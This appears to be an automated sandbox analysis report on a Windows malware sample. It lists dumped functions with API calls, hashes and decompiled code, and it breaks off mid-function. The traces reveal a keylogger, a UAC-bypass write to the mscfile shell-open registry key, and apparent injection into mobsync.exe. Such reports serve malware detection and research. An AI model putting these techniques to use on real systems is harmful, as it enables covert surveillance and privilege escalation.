                                    • waveInStart.WINMM ref: 006D1CE2
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID:
                                    • API String ID: 1356121797-0
                                    • Opcode ID: 683856ac1688c4412e57581decf46cc1bb21dd2c9a9da906dbb428f8737a80c3
                                    • Instruction ID: 5098f82a7c65e35bbfe24fd906d9d7e3d14cf82d26c0ca2e48197d24108299d7
                                    • Opcode Fuzzy Hash: 683856ac1688c4412e57581decf46cc1bb21dd2c9a9da906dbb428f8737a80c3
                                    • Instruction Fuzzy Hash: B1215C71A04A00ABE714DF76AC0A91A7BA5EB89312B00C02EF305DAAB1EB7C45019B5C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007175DA, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 007175E3
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00717606
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0071762C
                                    • _free.LIBCMT ref: 0071763F
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0071764E
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                    • String ID:
                                    • API String ID: 2278895681-0
                                    • Opcode ID: a72bde7abffcc27513b7a3629887304d55ed0e97f9301f66a59572cb33e0ee17
                                    • Instruction ID: bd5cdaaa1fb6cd12c57856179e30134cc743368cfe0d270b14b4d72ffedabe3e
                                    • Opcode Fuzzy Hash: a72bde7abffcc27513b7a3629887304d55ed0e97f9301f66a59572cb33e0ee17
                                    • Instruction Fuzzy Hash: 980184B2605A15BF673516AE5C8DCBB7A7DDBC6FA03140129F904C3280DE6D8D42D1B4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00711D66, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,0070A509,0070F9CF,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 00711D6B
                                    • _free.LIBCMT ref: 00711DA0
                                    • _free.LIBCMT ref: 00711DC7
                                    • SetLastError.KERNEL32(00000000), ref: 00711DD4
                                    • SetLastError.KERNEL32(00000000), ref: 00711DDD
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 805a63daa31bd173b882cedac10daa846ecc069221d26004415ce70dce960656
                                    • Instruction ID: a7e72125ca1319e437e58b40f624933d144441d46e06c312f1258f88e61637dc
                                    • Opcode Fuzzy Hash: 805a63daa31bd173b882cedac10daa846ecc069221d26004415ce70dce960656
                                    • Instruction Fuzzy Hash: D4014936340200FB9322636D7C4EDDF26799BC13B17600129F744962D2EE7CCD824124
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00718C3C, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00718C54
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 00718C66
                                    • _free.LIBCMT ref: 00718C78
                                    • _free.LIBCMT ref: 00718C8A
                                    • _free.LIBCMT ref: 00718C9C
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: b448499165ef86bcfddd747c0fa659aafdf82417942d436b866dd26b9872b713
                                    • Instruction ID: 10beddef9079f681efc48dc1544c556ca59fe858cd5454be2e086be216b5581d
                                    • Opcode Fuzzy Hash: b448499165ef86bcfddd747c0fa659aafdf82417942d436b866dd26b9872b713
                                    • Instruction Fuzzy Hash: 17F03C32505218FB8760EB6DE98AC9A73F9AB407107644849F288D7580CF6CFCC08AB6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070D8BC, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 0070D8DA
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 0070D8EC
                                    • _free.LIBCMT ref: 0070D8FF
                                    • _free.LIBCMT ref: 0070D910
                                    • _free.LIBCMT ref: 0070D921
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: bfe0bc0f74245e4b5cc9016fcd18441c1b1703b90948e740adb443bcc8a051b9
                                    • Instruction ID: c61bc81ed53b6879e6e5f6762c0af4216f64b451ea5333385647261c7ac8620b
                                    • Opcode Fuzzy Hash: bfe0bc0f74245e4b5cc9016fcd18441c1b1703b90948e740adb443bcc8a051b9
                                    • Instruction Fuzzy Hash: 82F03A71802A20EFE7116F28AC464483B60A704722702C106F344526B1EF7D08C5EFCA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E0D8E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 006E0DF5
                                    • RegEnumKeyExW.ADVAPI32 ref: 006E0E24
                                    • RegEnumValueW.ADVAPI32 ref: 006E0EC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]
                                    • API String ID: 3554306468-4262303796
                                    • Opcode ID: d171684603520d51c997ec8c3ba09f317d342c496b8654638660ca239062314b
                                    • Instruction ID: 46a3231d1dc89d19a33c39bde425d831187aaa3ea2918368e4f67e373df8e39a
                                    • Opcode Fuzzy Hash: d171684603520d51c997ec8c3ba09f317d342c496b8654638660ca239062314b
                                    • Instruction Fuzzy Hash: 8F514F71D00219AADB51EB95DC92EEFB7BEEF14300F10016AF505E6241EF746B49CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00716969, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strpbrk.LIBCMT ref: 007169B8
                                    • _free.LIBCMT ref: 00716AD5
                                      • Part of subcall function 0070698A: IsProcessorFeaturePresent.KERNEL32(00000017,0070695C,?,?,?,?,?,00000000,?,?,0070697C,00000000,00000000,00000000,00000000,00000000), ref: 0070698C
                                      • Part of subcall function 0070698A: GetCurrentProcess.KERNEL32(C0000417), ref: 007069AE
                                      • Part of subcall function 0070698A: TerminateProcess.KERNEL32(00000000), ref: 007069B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    • Opcode ID: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
                                    • Instruction ID: 0a6e8fcf006cbc6e9a8b119a95e980b60732f8def8ac84022477e2fc3e7c1e14
                                    • Opcode Fuzzy Hash: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
                                    • Instruction Fuzzy Hash: 44517075E00219EFDF14DFACC841AEDBBB5EF48314F24816DE554E7380E679AA418B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E576E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E4906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006E4921
                                      • Part of subcall function 006E4906: CreateCompatibleDC.GDI32(00000000), ref: 006E492D
                                      • Part of subcall function 006E441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 006E4431
                                      • Part of subcall function 006E4493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 006E44A4
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • DeleteFileW.KERNEL32(00000000,0000001B), ref: 006E5858
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile$GdipImage$CompatibleDeleteFromLoadSaveStream
                                    • String ID: dat$image/png$png
                                    • API String ID: 4253173196-186023265
                                    • Opcode ID: a8064c883a2379819aebefac420c72111a46882554b7f4d08b8eff04b4617dde
                                    • Instruction ID: d2683ef7b19e6218513a5c9a23ce7528b8c5aa2b7ce9d07e82684afd7f853aab
                                    • Opcode Fuzzy Hash: a8064c883a2379819aebefac420c72111a46882554b7f4d08b8eff04b4617dde
                                    • Instruction Fuzzy Hash: A94145719083409BC354FB60D862DEFB7E7AF95350F00092EF446572A2EF705A09C79A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070CC8A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0070CCCA
                                    • _free.LIBCMT ref: 0070CD95
                                    • _free.LIBCMT ref: 0070CD9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\SysWOW64\mobsync.exe
                                    • API String ID: 2506810119-2325505231
                                    • Opcode ID: 2aad9025726c782324640224da04362af7b846a398f6a1ea7a6e7b11a08014a3
                                    • Instruction ID: a5efcefbaaef0a1801d28f174d704be1e03429c92362fe728cb13e898dab1dc6
                                    • Opcode Fuzzy Hash: 2aad9025726c782324640224da04362af7b846a398f6a1ea7a6e7b11a08014a3
                                    • Instruction Fuzzy Hash: C3318071A00218EFDB22DF99DC8599EBBFCEB85310F104266F90997291DB788A45DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D951E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • CloseHandle.KERNEL32(?), ref: 006D9581
                                    • UnhookWindowsHookEx.USER32 ref: 006D9594
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped$[Info]
                                    • API String ID: 3650414481-1913360614
                                    • Opcode ID: 03029e14d69532070f9a8d6410c5f89bc0688341c9a7ac9ded124fee2c49cd7c
                                    • Instruction ID: 8747588dc2c104d0b98ed0893ac463bf3d74c7218dc04eb56c4babdf55df5c75
                                    • Opcode Fuzzy Hash: 03029e14d69532070f9a8d6410c5f89bc0688341c9a7ac9ded124fee2c49cd7c
                                    • Instruction Fuzzy Hash: C5014C31E002016BD7267738D8077BEBBB39F56310F80016EE58112352DB756946C7EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DC0AB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DC119
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: e8bf0524068c5f44cd78a1573d03567225aa043d1ead265c234b698673b6d16f
                                    • Instruction ID: 09b9b05d5d9b6c1d5d8d26a6ff9741fa3e9d72054c774ba601bd644bc5aa0f4a
                                    • Opcode Fuzzy Hash: e8bf0524068c5f44cd78a1573d03567225aa043d1ead265c234b698673b6d16f
                                    • Instruction Fuzzy Hash: E001D6B1D8030DFAEB50EA54CC13FFA735A9B10750F50840FFA01963C3DA696502C6A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E0A30, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 006E0A4C
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 006E0A65
                                    • RegCloseKey.ADVAPI32(00000000), ref: 006E0A70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: origmsc
                                    • API String ID: 3677997916-68016026
                                    • Opcode ID: cfc9e239d5765fc97b657833fc907557c6eb208036a123ead5d2ac462e850868
                                    • Instruction ID: 970088e25d63e47768a9b1e61397e165024d3242ba2072eb11aef2edde3843c1
                                    • Opcode Fuzzy Hash: cfc9e239d5765fc97b657833fc907557c6eb208036a123ead5d2ac462e850868
                                    • Instruction Fuzzy Hash: 28018B3180022CBBDF219FA5DC08DEB7F3AEF05350F004155BA0962121D6358AA6DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E094E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0073C578,?), ref: 006E0978
                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 006E0993
                                    • RegCloseKey.ADVAPI32(00000000), ref: 006E099C
                                    Strings
                                    • http\shell\open\command, xrefs: 006E096E
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: http\shell\open\command
                                    • API String ID: 3677997916-1487954565
                                    • Opcode ID: 5163826a2ad21f00bea19926de05179a24fb8122013d1573f6ad67459068d453
                                    • Instruction ID: ddf95d2cf6080b9f6a8555c0e6221b534c9e6a839687ee2253a2ce716fe96c17
                                    • Opcode Fuzzy Hash: 5163826a2ad21f00bea19926de05179a24fb8122013d1573f6ad67459068d453
                                    • Instruction Fuzzy Hash: C4F0C871900118FBEB70DA96EC09EDFBBBDEB84B01F104065B944E1111DA745F458BB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E0B4C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0073BB08), ref: 006E0B57
                                    • RegSetValueExW.ADVAPI32(0073BB08,0072F724,00000000,00000000,00000000,00000000,0072F724,?,80000001,?,006D6020,0072F724,0073BB08), ref: 006E0B86
                                    • RegCloseKey.ADVAPI32(0073BB08,?,80000001,?,006D6020,0072F724,0073BB08), ref: 006E0B91
                                    Strings
                                    • Software\Classes\mscfile\shell\open\command, xrefs: 006E0B55
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Classes\mscfile\shell\open\command
                                    • API String ID: 1818849710-505396733
                                    • Opcode ID: 46e5dd8180566aa7c1c680ab9f7103b7fccd9a2416d30043fa7bc9f21827d5cf
                                    • Instruction ID: 302d74ec9279b211bc115442fc1e81b18efe24ae4c4c96268c21c31ed711e190
                                    • Opcode Fuzzy Hash: 46e5dd8180566aa7c1c680ab9f7103b7fccd9a2416d30043fa7bc9f21827d5cf
                                    • Instruction Fuzzy Hash: 1FF0AF31400108BBDF209FA0EC05EEA776EEB04750F108519BC0596210E67A9F04DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D13AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 006D13B7
                                    • GetProcAddress.KERNEL32(00000000), ref: 006D13BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 409e458e0f8c7ea3751c6682eaba15602038bf0f0dd80945bf980795830c18f4
                                    • Instruction ID: 07a902c3e07e404acd281fede7a68920718c0324d86dc14a6c4521126128996d
                                    • Opcode Fuzzy Hash: 409e458e0f8c7ea3751c6682eaba15602038bf0f0dd80945bf980795830c18f4
                                    • Instruction Fuzzy Hash: 88B092F16826009BA6216BB0AD0D8883AF4F654703B108851B101D21A1CB7C41019F28
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D1468, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 006D1472
                                    • GetProcAddress.KERNEL32(00000000), ref: 006D1479
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 25a0f26f60bc88d79eb5edf28c99c037a17e8364e51b8a6e8541b946f22f7794
                                    • Instruction ID: c3b2e2081cc47320cf9086a6096ed3944a89fd2f3a8dc30e3f88e153e097295d
                                    • Opcode Fuzzy Hash: 25a0f26f60bc88d79eb5edf28c99c037a17e8364e51b8a6e8541b946f22f7794
                                    • Instruction Fuzzy Hash: CBB092F06407049BA6219BB0AD0D8083E7AB644702B00C944F106921A1CB7C4102BB39
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D1485, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 006D148F
                                    • GetProcAddress.KERNEL32(00000000), ref: 006D1496
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetConsoleWindow$kernel32.dll
                                    • API String ID: 2574300362-100875112
                                    • Opcode ID: 66e3665307eadc3c418546b12310b5e43de58e48a96da76151ccdaefadb2dbd0
                                    • Instruction ID: 73ddfd06917525543fc58baafb5d2126e346349dc778046b6920e0b9038f3bd8
                                    • Opcode Fuzzy Hash: 66e3665307eadc3c418546b12310b5e43de58e48a96da76151ccdaefadb2dbd0
                                    • Instruction Fuzzy Hash: 6EB092F06423009BA6319BB0AE1D8083B7BA70470AB00C444B601921A1CA7C42029B39
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00713812, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID:
                                    • API String ID: 1036877536-0
                                    • Opcode ID: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
                                    • Instruction ID: c898342938cfa311a070de927f71d209b5cfae7e6b4625082f980c30ed50f3cf
                                    • Opcode Fuzzy Hash: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
                                    • Instruction Fuzzy Hash: 0EA13771A003869FDB11CF5CC891BEEBBE5EF15354F14816DE4859B2C2D67C9A81C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072029A, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 0af3302f0e4d7c4d98f7a0f08b7416f480f0c787c05e6f21e0a6c6580a98ca1e
                                    • Instruction ID: 66fa3ba28a656ae191c94419d183abe8d5f740ec3ef4dcd243a42bb4f4a4a799
                                    • Opcode Fuzzy Hash: 0af3302f0e4d7c4d98f7a0f08b7416f480f0c787c05e6f21e0a6c6580a98ca1e
                                    • Instruction Fuzzy Hash: A8411B31A00620EBDB25ABBCAC89AAE3AE4EF45330F144659F518D61D3E67C8D4056F2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070C481, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 486f9d734d77c729dab6cdc60f8cf8aa2cf78c22256966be7fc9976514f50a39
                                    • Instruction ID: 52f70d158d2b6d30792352bc3542c2e2a15396777068d3e54d099ef3a5691112
                                    • Opcode Fuzzy Hash: 486f9d734d77c729dab6cdc60f8cf8aa2cf78c22256966be7fc9976514f50a39
                                    • Instruction Fuzzy Hash: 7D410672A00344EFD7259F38CC55B6ABBE8FB88710F20472AF115DB2D1D679A9118790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 105CD2F4, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E105CD2F4(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E105CD441(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = L105E1A33(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591d8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x4591a4;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = L105E1A33( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = L105E1A33(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = L105E1A33(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E105CB377();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
